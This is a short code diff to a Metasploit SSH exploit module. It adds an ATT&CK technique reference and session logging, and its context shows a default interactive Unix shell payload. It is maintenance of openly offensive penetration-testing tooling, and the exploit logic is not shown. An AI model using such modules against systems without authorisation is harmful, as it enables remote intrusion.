@@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
           'License' => MSF_LICENSE,
           'References' => [
-            ['PACKETSTORM', '125754']
+            ['PACKETSTORM', '125754'],
+            ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
           ],
           'DisclosureDate' => '2014-03-17',
           'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
@@ -108,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if ssh_socket
 
       # Create a new session from the socket, then dump it.
-      conn = Net::SSH::CommandStream.new(ssh_socket)
+      conn = Net::SSH::CommandStream.new(ssh_socket, logger: self)
       ssh_socket = nil
 
       return conn
